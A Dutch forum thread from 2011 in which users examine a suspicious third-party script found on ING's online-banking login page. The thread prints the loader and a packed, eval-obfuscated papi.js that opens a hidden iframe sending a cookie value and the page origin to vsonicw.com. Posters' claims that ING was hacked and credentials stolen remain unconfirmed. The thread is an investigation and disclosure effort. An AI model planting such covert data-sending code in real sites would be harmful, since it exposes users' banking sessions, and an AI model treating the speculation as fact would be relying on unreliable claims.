Toon posts:

Verdachte dingen bij inloggen op mijn.ing.nl

Pagina: 1 2 3 4 5 Laatste
Acties:

Onderwerpen

Bank Hack

donderdag 4 augustus 2011 16:36

Acties:
  • 0Henk 'm!
  • JorritJ
  • Registratie: Augustus 2011
  • Laatst online: 09-11-2019

JorritJ

Topicstarter
Ik heb iets vreemds gezien op https://mijn.ing.nl wat ik niet helemaal vertrouw. Na het inloggen op mijn ING zag ik wat andere domeinnamen dan die van ING voorbij komen.
Als ik een view source van de site doe kom ik een script tegen:
JavaScript:
1
2
3
4
5
6
7
8
9

<script type="text/javascript">
(function() {var snippetID = '33271',
host = 'www.primebyte.net',
sn = document.createElement('script');
sn.setAttribute('async', true);
sn.setAttribute('type', 'text/javascript');
sn.setAttribute('src', (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//' + host + '/' + snippetID + '/' + 'papi.js');
var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(sn, s);})();
</script>


Hierdoor wordt er een bestand ingeladen vanaf: http://www.primebyte.net/33271/papi.js
De inhoud is geminified of in ieder geval onleesbaar gemaakt, maar ik zie namen van verschillende andere banken voorbij komen.
JavaScript:
1
2

/* Copyright (c) 2011. All rights reserved. Distribution and/or use of this software are strictly prohibited except according to this limited license. Copyright holder hereby grants you a limited, fully revocable, non-transferable (without the right to sublicense), non-exclusive, personal, royalty free license to use the software on your computer. You may not distribute, sell, disassemble, decompile, reverse engineer, modify, revise or enhance all or any part of this software or create any derivative works or otherwise merge or utilize all or any part of this software with or into other computer programs or other materials or attempt to discover all or any part of this software's source code or copy, publish or all or any part of this software. The software must retain the above copyright notice at all times. */
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([3-9F-QS-Z]|1\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(5(){3 c=document,g=Q,x=parent;3 j=g.G.Y!=\'Z:\'?\'http:\':\'Z:\',y=\'ing_nl\',k=\'33271\',l=\'v4.0\',m=\'ak\',n=S,o=\'&A=ebc_ebc1961/ebc1961.asp/logonnpbs.8.ukybonline.8.ukonline.bankofamerica.7/cgi-bin/ias/accounts-overview..T/U/U/10.do.hsbc.8.H/1/2/personal/.halifax-online.8.H/DisplayMyAccounts:viewMyAccountsnwolb.7/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.8.H/loginTFA.domeine.deutsche-bank.T/trxm/db/itan.authorizationmijn.ing.nl/8-operativebank.8.H/corp/BANKAWAYgbw.it.chase.7/MyAccountsbcp.ptmy.ebay.8.H/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.T/.12.firstdirect.7/1/2/12.anz.commyspace.7/paypal.secure/arcot.royalbank.7/CapitalOne_Consumer//cmserver/verify.cfmmail.live.7/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.7.indexsampopank./.citibank.7/US/JPS/U/10.doasnbank.nl/\',p=\'www.vsonicw.7\',q=\'s\';3 z=5(){4(c.13!=\'K\'&&c.13==\'CSS1Compat\')?L:S}();5 A(){4 14 15()}5 r(){3 b=14 15();b.setDate(b.getDate()+365);4 b.toGMTString()};5 s(b,a){4[b,\'=\',16(a),\';\',\'17=\',r()].V(\'\')};5 B(b,a){c.9=s(b,a)};5 i(b){6(navigator.cookieEnabled==L){4 W}6(c.9.M>0){F=c.9.18(b+"=");6(F!=-1){F=F+b.M+1;N=c.9.18(";",F);6(N==-1){N=c.9.M}4 unescape(c.9.substring(F,N))}}4 W};5 C(b){c.9=b+"\'\';17=Thu, 01-Jan-1970 00:00:01 GMT"};5 D(b){3 a=i(b);6(!a){4 W}3 d={};3 f=a.split("|");X(3 h=0,t=f.M;h<t;h+=2){d[f[h]]=f[h+1]}4 d};5 E(b){3 a=[];X(3 d in b){a.push(d,b[d])}4 a.V("|")}5 u(a){6(!g){4}6(c.readyState==\'complete\'){a();4}6(O(g.1c)!=\'K\'){g.1c(\'load\',a,L);4}6(O(g.1d)!=\'K\'){g.1d(\'P\',a);4}3 d=a;6(O(g.P)==\'5\'){3 f=g.P;d=5(){3 b=a();4(f?f():b)};g.P=d}};5 v(b,a){3 d=c.1e(b);X(3 f in a){d[f]=a[f]}4 d};5 w(){1f{6(!c.1e||c.getElementById(\'I-J\')){4 S}3 b=16(c.G.Y+"//"+c.G.host);3 a=v(\'iframe\',{id:\'I-J\',name:\'I-J\'});a.style.display=\'none\';3 d=O(1g)!="K"&&1g()?1:0;3 f=i(m)||"";3 h=[j,\'//\',p,,\'/\',l,\'/\',k,\'/\',q,\'0\',\'?em=\',b,\'&1=\',f,\'&2=\',d,o].V(\'\');6(n){a.1h="javascript: L";c.1i.1j(a);1f{top.frame[\'I-J\'].Q.G.1k(h)}1l(e){this.frames[\'I-J\'].Q.G.1k(h)}}else{a.1h=h;c.1i.1j(a)}}1l(e){}}u(w)})();',[],84,'|||var|return|function|if|com|co|cookie||||||||||||||||||||||||||||||||start|location|uk|awa|proxy|undefined|false|length|end|typeof|onload|window||true|de|portal|join|null|for|protocol|https|Home||banking|compatMode|new|Date|escape|expires|indexOf||||addEventListener|attachEvent|createElement|try|isCompatible|src|body|appendChild|replace|catch'.split('|'),0,{}))

Ik zie verder dat er een request bij vsonicw.com wordt gedaan wat weer vanaf primebyte.net wordt geïnitieerd.

Dit alles is gewoon XSS, en lijkt me geen zuivere koffie.

Weet iemand wat er precies aan de hand is?

donderdag 4 augustus 2011 16:53

Acties:
  • 0Henk 'm!
  • Robtimus
  • Registratie: November 2002
  • Laatst online: 24-03 15:41

Robtimus

me Robtimus no like you

Die papi.js schijnt een JavaScript unpacker te zijn. Nog verder zoeken leidde tot dit, helaas is daar geen conclusie uit af te leiden.

More than meets the eye
There is no I in TEAM... but there is ME
Vroeger IceManX | system specs

donderdag 4 augustus 2011 16:57

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

JorritJ schreef op donderdag 04 augustus 2011 @ 16:36:
Dit alles is gewoon XSS, en lijkt me geen zuivere koffie.
Dit is geen XSS.
Het is XSS wanneer die door een derde partij, bijvoorbeeld via de url, in de pagina was geinjecteerd.

Is dit niet gewoon een analytics/tracker geval?

donderdag 4 augustus 2011 16:58

Acties:
  • 0Henk 'm!
  • CodeCaster
  • Registratie: Juni 2003
  • Niet online

CodeCaster

Can I get uhm...

frickY schreef op donderdag 04 augustus 2011 @ 16:57:
Is dit niet gewoon een analytics/tracker geval?
[google=+"www.primebyte.net"]

Ik denk eerder aan malware op de pc van TS.

https://oneerlijkewoz.nl
I have these thoughts / so often I ought / to replace that slot / with what I once bought / 'cause somebody stole my car radio / and now I just sit in silence

donderdag 4 augustus 2011 16:59

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Ik zit ook al te kijken naar de oorsprong van dat domein ja.

Het lijkt niet lokaal bij de TS geinjecteerd. Ik zie hem ook
https://mijn.ing.nl/internetbankieren/SesamLoginServlet op regel 128.

[Voor 47% gewijzigd door frickY op 04-08-2011 17:00]

donderdag 4 augustus 2011 17:01

Acties:
  • 0Henk 'm!
  • Kees
  • Registratie: Juni 1999
  • Laatst online: 24-03 15:22

Kees

Serveradmin / BOFH / DoC
De code staat er bij mij ook in, en 'www.primebyte.net' lijkt mij niet het meest betrouwbare domein (geen webpage, vage anonieme whois, weinig google resultaten).

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

donderdag 4 augustus 2011 17:02

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Begint er IMHO sterk op te lijken dat ING is gehacked en iemand JavaScript code heeft achtergelaten om bijv. cookies of andere info uit te lezen...

[Voor 7% gewijzigd door mindcrash op 04-08-2011 17:07]

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:02

Acties:
  • 0Henk 'm!
  • Cloud
  • Registratie: November 2001
  • Laatst online: 24-03 09:23

Cloud

FP ProMod

Ex-moderatie mobster

Ik krijg primebyte.net er ook tussen en ook het andere domein wat de TS noemt. Vind het ook een beetje apart. Zit te denken aan een CDN maar dan zou je toch een wat bekendere/betrouwbaarder uitziende partij verwachten.

Never attribute to malice that which can be adequately explained by stupidity. - Robert J. Hanlon
60% of the time, it works all the time. - Brian Fantana

donderdag 4 augustus 2011 17:02

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Vanuit papi wordt 
https://www.vsonicw.com/v4.0/33271/s0?em=https%3A//mijn.ing.nl&1=&2=0&A=ebc_ebc1961/ebc1961.asp/logonnpbs.co.ukybonline.co.ukonline.bankofamerica.com/cgi-bin/ias/accounts-overview..de/portal/portal/Home.do.hsbc.co.uk/1/2/personal/.halifax-online.co.uk/DisplayMyAccounts:viewMyAccountsnwolb.com/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.co.uk/loginTFA.domeine.deutsche-bank.de/trxm/db/itan.authorizationmijn.ing.nl/co-operativebank.co.uk/corp/BANKAWAYgbw.it.chase.com/MyAccountsbcp.ptmy.ebay.co.uk/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.de/.banking.firstdirect.com/1/2/banking.anz.commyspace.com/paypal.secure/arcot.royalbank.com/CapitalOne_Consumer//cmserver/verify.cfmmail.live.com/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.com.indexsampopank./.citibank.com/US/JPS/portal/Home.doasnbank.nl/
geladen, wat een HTML template lijkt te zijn.

donderdag 4 augustus 2011 17:03

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Same here.

donderdag 4 augustus 2011 17:03

Acties:
  • 0Henk 'm!
  • White_Collar
  • Registratie: Februari 2009
  • Laatst online: 21:15

White_Collar

Misschien even melden bij ing?

"The reason for time is so that everything doesn't happen at once"

donderdag 4 augustus 2011 17:04

Acties:
  • 0Henk 'm!
  • Erkens
  • Registratie: December 2001
  • Niet online

Erkens

Fotograaf / Backend developer

* Erkens heeft een mailtje naar ING hierover gestuurd.

Lijkt me dat dat een snellere manier is om er achter te komen wat dit is...

donderdag 4 augustus 2011 17:04

Acties:
  • 0Henk 'm!
  • hmmmmmmmmmpffff
  • Registratie: September 2009
  • Laatst online: 19:35

hmmmmmmmmmpffff

Zou inloggen op ing.nl om betalingen te doen nu misschien niet zo handig zijn dan?

donderdag 4 augustus 2011 17:04

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Erkens schreef op donderdag 04 augustus 2011 @ 17:04:
* Erkens heeft een mailtje naar ING hierover gestuurd.

Lijkt me dat dat een snellere manier is om er achter te komen wat dit is...
:Y

donderdag 4 augustus 2011 17:05

Acties:
  • 0Henk 'm!
  • Jejking
  • Registratie: Februari 2005
  • Niet online

Jejking

It's teatime, doctor!

hmmmmmmmmmpffff schreef op donderdag 04 augustus 2011 @ 17:04:
Zou inloggen op ing.nl om betalingen te doen nu misschien niet zo handig zijn dan?
Ik zou er voor de zekerheid even mee wachten, just in case.

donderdag 4 augustus 2011 17:06

Acties:
  • 0Henk 'm!
  • JorritJ
  • Registratie: Augustus 2011
  • Laatst online: 09-11-2019

JorritJ

Topicstarter
Ik heb contact gehad met ING en dit gemeld. De bestanden zijn naar ze doorgestuurd ter analyse.
Zij zeggen dat ze het blokje code er niet in hebben staan, maar als ik de ING was zou ik dat ook zeggen ook als is het niet zo. :)

donderdag 4 augustus 2011 17:07

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Bij het submitten van het login formulier gebeurd er wederom een POST-request naar www.vsonicw.com.
De logingegevens zijn niet plain-text in dit request te vinden.. maar dat zegt nog weinig.

donderdag 4 augustus 2011 17:08

Acties:
  • 0Henk 'm!
  • ev1ltje
  • Registratie: September 2007
  • Laatst online: 30-04-2018

ev1ltje

euh.. proper?

JorritJ schreef op donderdag 04 augustus 2011 @ 17:06:
Ik heb contact gehad met ING en dit gemeld. De bestanden zijn naar ze doorgestuurd ter analyse.
Zij zeggen dat ze het blokje code er niet in hebben staan, maar als ik de ING was zou ik dat ook zeggen ook als is het niet zo. :)
d:)b

Specsels ♦♦♦ 5D Mark II + wat mooi glaswerk en lichtjes

donderdag 4 augustus 2011 17:09

Acties:
  • 0Henk 'm!
  • JorritJ
  • Registratie: Augustus 2011
  • Laatst online: 09-11-2019

JorritJ

Topicstarter
De post die naar vsonicw.com wordt gedaan gaat over https en dat kan ik helaas niet analyseren.
Het blokje var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(sn, s);})();
zorgt er in ieder geval voor dat na het klikken op de inlogknop de boel kan worden doorgestuurd.

donderdag 4 augustus 2011 17:09

Acties:
  • 0Henk 'm!
  • Brons
  • Registratie: April 2002
  • Laatst online: 16-03 02:52

Brons

Fail!

Is het gebruiken van externe domeinen sowieso niet een big no-no voor dit soort websites? Dat deze domeinen geanonimiseerd zijn maakt het alleen maar meer fishy.

Het lijkt mij verstandig als ING dit er uit haalt, zelfs als het voor tracking oid is.

donderdag 4 augustus 2011 17:09

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

De [url="view-source:https://www.vsonicw.com/v4.0/33271/s0?em=https%3A//mijn.ing.nl&1=&2=0&A=ebc_ebc1961/ebc1961.asp/logonnpbs.co.ukybonline.co.ukonline.bankofamerica.com/cgi-bin/ias/accounts-overview..de/portal/portal/Home.do.hsbc.co.uk/1/2/personal/.halifax-online.co.uk/DisplayMyAccounts:viewMyAccountsnwolb.com/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.co.uk/loginTFA.domeine.deutsche-bank.de/trxm/db/itan.authorizationmijn.ing.nl/co-operativebank.co.uk/corp/BANKAWAYgbw.it.chase.com/MyAccountsbcp.ptmy.ebay.co.uk/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.de/.banking.firstdirect.com/1/2/banking.anz.commyspace.com/paypal.secure/arcot.royalbank.com/CapitalOne_Consumer//cmserver/verify.cfmmail.live.com/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.com.indexsampopank./.citibank.com/US/JPS/portal/Home.doasnbank.nl/sas-docs/js/verifyImage.js"]HTML [/url]die vanuit vsonicw.com terug komt bevat de title "at a glance banking".
Dit kan verwijzen naar SaveGarde, maar ook dat ziet er onbetrouwbaar uit.

@JorritJ
In Webdeveloper (Firefox) of Developer Tools (Chrome) kun je het volledige request en response zien.

De POST lijkt echter pas te gebeuren nadat de pagina opnieuw is geladen, niet zodra je de loginknop indrukt.

[Voor 88% gewijzigd door frickY op 04-08-2011 17:13]

donderdag 4 augustus 2011 17:11

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Wellicht gebruiken ze hetzelfde stuk JavaScript om bij diverse banken "in te breken"?

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:11

Acties:
  • 0Henk 'm!
  • Puch-Maxi
  • Registratie: December 2003
  • Laatst online: 00:58

Puch-Maxi

Ik ben helemaal geen klant van ING, maar ik kom ook papi.js tegen op mijn.ing.nl.

My favorite programming language is solder.

donderdag 4 augustus 2011 17:12

Acties:
  • 0Henk 'm!
  • Ankh
  • Registratie: Mei 2001
  • Laatst online: 24-03 13:22

Ankh

|true

Hmm hoorde net ook al een verhaal van een (collega)engineer. Weet alleen niet of het nou ING was of niet.
Maar een klant zijn gegevens waren vanochtend gestolen op een bank website (ofzo).

[Voor 5% gewijzigd door Ankh op 04-08-2011 17:14]

-Ankh- Camera Gear: Nikon D7000 | Nikon AF-S DX 16-85mm f3.5-5.6 AF-S DX VR & Tokina AT-X 116 Pro DX AF 11-16mm f2,8

donderdag 4 augustus 2011 17:12

Acties:
  • 0Henk 'm!
  • luukske21
  • Registratie: Februari 2011
  • Laatst online: 23-03-2016

luukske21

same here papi.js aanwezig

ing u have been hacked :\

donderdag 4 augustus 2011 17:13

Acties:
  • 0Henk 'm!
  • JorritJ
  • Registratie: Augustus 2011
  • Laatst online: 09-11-2019

JorritJ

Topicstarter
De stukjes script die ik zo zie op de viewsonic site geven wel een hoop andere banknamen weer:
bankofamerica
halifax-online
Statementsbanquepopulaire.fr
deutsche-bank
authorizationmijn.ing.nl
chase
ebay
paypal
royalbank

enz enz enz...

Weet iemand dit stukje te ontsleutelen?

donderdag 4 augustus 2011 17:13

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Vind het trouwens wel raar dat ING de boel niet even offline gooit na een aantal meldingen dat er iets heel erg merkwaardigs in de HTML code staat...

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:13

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Ankh schreef op donderdag 04 augustus 2011 @ 17:12:
Hmm hoorde net ook al een verhaal van een engineer. Weet alleen niet of het nou ING was of niet.
Maar zijn gegevens waren vanochtend gestolen op een bank website (ofzo).
dan is het maar goed ik vandaag niet ingelogt ben.
mindcrash schreef op donderdag 04 augustus 2011 @ 17:13:
Vind het trouwens wel raar dat ING de boel niet even offline gooit na een aantal meldingen dat er iets heel erg merkwaardigs in de HTML code staat...
Inderdaad.
better save then sorry zou je denken.

[Voor 32% gewijzigd door Mektheb op 04-08-2011 17:14]

donderdag 4 augustus 2011 17:14

Acties:
  • 0Henk 'm!
  • Robtimus
  • Registratie: November 2002
  • Laatst online: 24-03 15:41

Robtimus

me Robtimus no like you

Ik heb geprobeerd de inhoud van papi.js te ontcijferen, maar buiten het feit dat een packer / unpacker is gebruikt kom ik niet ver.

Voor de geinteresseerden:
JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

/* Copyright (c) 2011. All rights reserved. Distribution and/or use of this software are strictly prohibited except according to this limited license. Copyright holder hereby grants you a limited, fully revocable, non-transferable (without the right to sublicense), non-exclusive, personal, royalty free license to use the software on your computer. You may not distribute, sell, disassemble, decompile, reverse engineer, modify, revise or enhance all or any part of this software or create any derivative works or otherwise merge or utilize all or any part of this software with or into other computer programs or other materials or attempt to discover all or any part of this software's source code or copy, publish or all or any part of this software. The software must retain the above copyright notice at all times. */
eval(
    function(p,a,c,k,e,r)
    {
        e=function(c)
        {
            return
                (c<62?'':e(parseInt(c/62)))
                +
                ((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))
        };
        if('0'.replace(0,e)==0)
        {
            while(c--)
                r[e(c)]=k[c];
            k=[
                function(e){
                    return r[e]||e
                }
            ];
            e=function()
            {
                return'([3-9F-QS-Z]|1\\w)'
            };
            c=1
        };
        while(c--)
            if(k[c])
                p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
    }
    ('(5(){3 c=document,g=Q,x=parent;3 j=g.G.Y!=\'Z:\'?\'http:\':\'Z:\',y=\'ing_nl\',k=\'33271\',l=\'v4.0\',m=\'ak\',n=S,o=\'&A=ebc_ebc1961/ebc1961.asp/logonnpbs.8.ukybonline.8.ukonline.bankofamerica.7/cgi-bin/ias/accounts-overview..T/U/U/10.do.hsbc.8.H/1/2/personal/.halifax-online.8.H/DisplayMyAccounts:viewMyAccountsnwolb.7/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.8.H/loginTFA.domeine.deutsche-bank.T/trxm/db/itan.authorizationmijn.ing.nl/8-operativebank.8.H/corp/BANKAWAYgbw.it.chase.7/MyAccountsbcp.ptmy.ebay.8.H/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.T/.12.firstdirect.7/1/2/12.anz.commyspace.7/paypal.secure/arcot.royalbank.7/CapitalOne_Consumer//cmserver/verify.cfmmail.live.7/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.7.indexsampopank./.citibank.7/US/JPS/U/10.doasnbank.nl/\',p=\'www.vsonicw.7\',q=\'s\';3 z=5(){4(c.13!=\'K\'&&c.13==\'CSS1Compat\')?L:S}();5 A(){4 14 15()}5 r(){3 b=14 15();b.setDate(b.getDate()+365);4 b.toGMTString()};5 s(b,a){4[b,\'=\',16(a),\';\',\'17=\',r()].V(\'\')};5 B(b,a){c.9=s(b,a)};5 i(b){6(navigator.cookieEnabled==L){4 W}6(c.9.M>0){F=c.9.18(b+"=");6(F!=-1){F=F+b.M+1;N=c.9.18(";",F);6(N==-1){N=c.9.M}4 unescape(c.9.substring(F,N))}}4 W};5 C(b){c.9=b+"\'\';17=Thu, 01-Jan-1970 00:00:01 GMT"};5 D(b){3 a=i(b);6(!a){4 W}3 d={};3 f=a.split("|");X(3 h=0,t=f.M;h<t;h+=2){d[f[h]]=f[h+1]}4 d};5 E(b){3 a=[];X(3 d in b){a.push(d,b[d])}4 a.V("|")}5 u(a){6(!g){4}6(c.readyState==\'complete\'){a();4}6(O(g.1c)!=\'K\'){g.1c(\'load\',a,L);4}6(O(g.1d)!=\'K\'){g.1d(\'P\',a);4}3 d=a;6(O(g.P)==\'5\'){3 f=g.P;d=5(){3 b=a();4(f?f():b)};g.P=d}};5 v(b,a){3 d=c.1e(b);X(3 f in a){d[f]=a[f]}4 d};5 w(){1f{6(!c.1e||c.getElementById(\'I-J\')){4 S}3 b=16(c.G.Y+"//"+c.G.host);3 a=v(\'iframe\',{id:\'I-J\',name:\'I-J\'});a.style.display=\'none\';3 d=O(1g)!="K"&&1g()?1:0;3 f=i(m)||"";3 h=[j,\'//\',p,,\'/\',l,\'/\',k,\'/\',q,\'0\',\'?em=\',b,\'&1=\',f,\'&2=\',d,o].V(\'\');6(n){a.1h="javascript: L";c.1i.1j(a);1f{top.frame[\'I-J\'].Q.G.1k(h)}1l(e){this.frames[\'I-J\'].Q.G.1k(h)}}else{a.1h=h;c.1i.1j(a)}}1l(e){}}u(w)})();',[],84,'|||var|return|function|if|com|co|cookie||||||||||||||||||||||||||||||||start|location|uk|awa|proxy|undefined|false|length|end|typeof|onload|window||true|de|portal|join|null|for|protocol|https|Home||banking|compatMode|new|Date|escape|expires|indexOf||||addEventListener|attachEvent|createElement|try|isCompatible|src|body|appendChild|replace|catch'.split('|'),0,{})
)
Regel 32 kom ik nog niet helemaal / helemaal niet uit...

More than meets the eye
There is no I in TEAM... but there is ME
Vroeger IceManX | system specs

donderdag 4 augustus 2011 17:15

Acties:
  • 0Henk 'm!
  • batsma
  • Registratie: April 2005
  • Niet online

batsma

kom het niet tegen op de site van rabobank.nl -> inloggen

donderdag 4 augustus 2011 17:16

Acties:
  • 0Henk 'm!
  • Nic
  • Registratie: April 2005
  • Laatst online: 00:40

Nic

Vrij

Robtimus schreef op donderdag 04 augustus 2011 @ 17:14:
Ik heb geprobeerd de inhoud van papi.js te ontcijferen, maar buiten het feit dat een packer / unpacker is gebruikt kom ik niet ver.
Heel eenvoudig: wijzig 'eval()' naar 'alert()' en het script wat normaal uitgevoerd wordt is zichtbaar als alert :-)

donderdag 4 augustus 2011 17:17

Acties:
  • 0Henk 'm!
  • robbinonline
  • Registratie: September 2007
  • Laatst online: 21-03 16:56

robbinonline

http://goo.gl/OKn06A

Op twitter word vaak wel binnen een klein uurtje gereageerd door de ING
https://twitter.com/#!/INGnl_webcare

Ga niet uit van het haalbare, maar van het denkbare

donderdag 4 augustus 2011 17:18

Acties:
  • 0Henk 'm!

Anoniem: 417641

Ik zit hier ook al een tijdje aan te pluizen, klopt volgens mij niks van!

andere plek waar primebyte voorkomt:

http://www.google.com/url...5LqXrKCYFhbV3I5fA&cad=rja

donderdag 4 augustus 2011 17:19

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

dsltv schreef op donderdag 04 augustus 2011 @ 17:16:
[...]


Heel eenvoudig: wijzig 'eval()' naar 'alert()' en het script wat normaal uitgevoerd wordt is zichtbaar als alert :-)
Dat is;
(5(){3 c=document,g=Q,x=parent;3 j=g.G.Y!='Z:'?'http:':'Z:',y='ing_nl',k='33271',l='v4.0',m='ak',n=S,o='&A=ebc_ebc1961/ebc1961.asp/logonnpbs.8.ukybonline.8.ukonline.bankofamerica.7/cgi-bin/ias/accounts-overview..T/U/U/10.do.hsbc.8.H/1/2/personal/.halifax-online.8.H/DisplayMyAccounts:viewMyAccountsnwolb.7/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.8.H/loginTFA.domeine.deutsche-bank.T/trxm/db/itan.authorizationmijn.ing.nl/8-operativebank.8.H/corp/BANKAWAYgbw.it.chase.7/MyAccountsbcp.ptmy.ebay.8.H/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.T/.12.firstdirect.7/1/2/12.anz.commyspace.7/paypal.secure/arcot.royalbank.7/CapitalOne_Consumer//cmserver/verify.cfmmail.live.7/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.7.indexsampopank./.citibank.7/US/JPS/U/10.doasnbank.nl/',p='www.vsonicw.7',q='s';3 z=5(){4(c.13!='K'&&c.13=='CSS1Compat')?L:S}();5 A(){4 14 15()}5 r(){3 b=14 15();b.setDate(b.getDate()+365);4 b.toGMTString()};5 s(b,a){4[b,'=',16(a),';','17=',r()].V('')};5 B(b,a){c.9=s(b,a)};5 i(b){6(navigator.cookieEnabled==L){4 W}6(c.9.M>0){F=c.9.18(b+"=");6(F!=-1){F=F+b.M+1;N=c.9.18(";",F);6(N==-1){N=c.9.M}4 unescape(c.9.substring(F,N))}}4 W};5 C(b){c.9=b+"'';17=Thu, 01-Jan-1970 00:00:01 GMT"};5 D(b){3 a=i(b);6(!a){4 W}3 d={};3 f=a.split("|");X(3 h=0,t=f.M;h

donderdag 4 augustus 2011 17:19

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

robbinonline schreef op donderdag 04 augustus 2011 @ 17:17:
Op twitter word vaak wel binnen een klein uurtje gereageerd door de ING
https://twitter.com/#!/INGnl_webcare
Binnen een klein uurtje hebben de gasten die die code in de ING site hebben weten te injecteren IMHO 100+ username/password combinaties of sessie ids te pakken

(want daar is het ze volgens mij om te doen)

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:19

Acties:
  • 0Henk 'm!
  • Matis
  • Registratie: Januari 2007
  • Laatst online: 22:55

Matis

Rubber Rocket

Ik zal maar niet meer inloggen op mijn.ing.nl vandaag :/

If money talks then I'm a mime
If time is money then I'm out of time

donderdag 4 augustus 2011 17:20

Acties:
  • 0Henk 'm!
  • Nic
  • Registratie: April 2005
  • Laatst online: 00:40

Nic

Vrij

frickY schreef op donderdag 04 augustus 2011 @ 17:19:
[...]

Dat is;
Nee, niet op regel 32, maar helemaal op de bovenaan in het packer script.

edit:
O wacht, het is 2x gepacked of zo....

[Voor 10% gewijzigd door Nic op 04-08-2011 17:22]

donderdag 4 augustus 2011 17:20

Acties:
  • 0Henk 'm!
  • robbinonline
  • Registratie: September 2007
  • Laatst online: 21-03 16:56

robbinonline

http://goo.gl/OKn06A

mindcrash schreef op donderdag 04 augustus 2011 @ 17:19:
[...]


Binnen een klein uurtje hebben de gasten die die code in de ING site hebben weten te injecteren IMHO 100+ username/password combinaties te pakken

(want daar is het ze volgens mij om te doen)
Ik log ook even niet in op ING.nl en heb het net gemeld aan de webcare.

Ga niet uit van het haalbare, maar van het denkbare

donderdag 4 augustus 2011 17:22

Acties:
  • 0Henk 'm!
  • Puch-Maxi
  • Registratie: December 2003
  • Laatst online: 00:58

Puch-Maxi

Zou dit enige relatie kunnen hebben aan dit?
http://www.theregister.co..._online_banking_concerns/

My favorite programming language is solder.

donderdag 4 augustus 2011 17:22

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

robbinonline schreef op donderdag 04 augustus 2011 @ 17:20:
[...]

Ik log ook even niet in op ING.nl en heb het net gemeld aan de webcare.
Wie weet staat het er al langer op.
Of heeft iemand het vandaag ondekt en gistere nog niet ?.

donderdag 4 augustus 2011 17:23

Acties:
  • 0Henk 'm!
  • Vos
  • Registratie: Juni 2000
  • Laatst online: 22:39

Vos

AFCA

Vanmiddag nog ingelogd...straks maar even ww veranderen.

#36

donderdag 4 augustus 2011 17:25

Acties:
  • 0Henk 'm!
  • Cubic X
  • Registratie: Augustus 2006
  • Laatst online: 20:13

Cubic X

Vos schreef op donderdag 04 augustus 2011 @ 17:23:
Vanmiddag nog ingelogd...straks maar even ww veranderen.
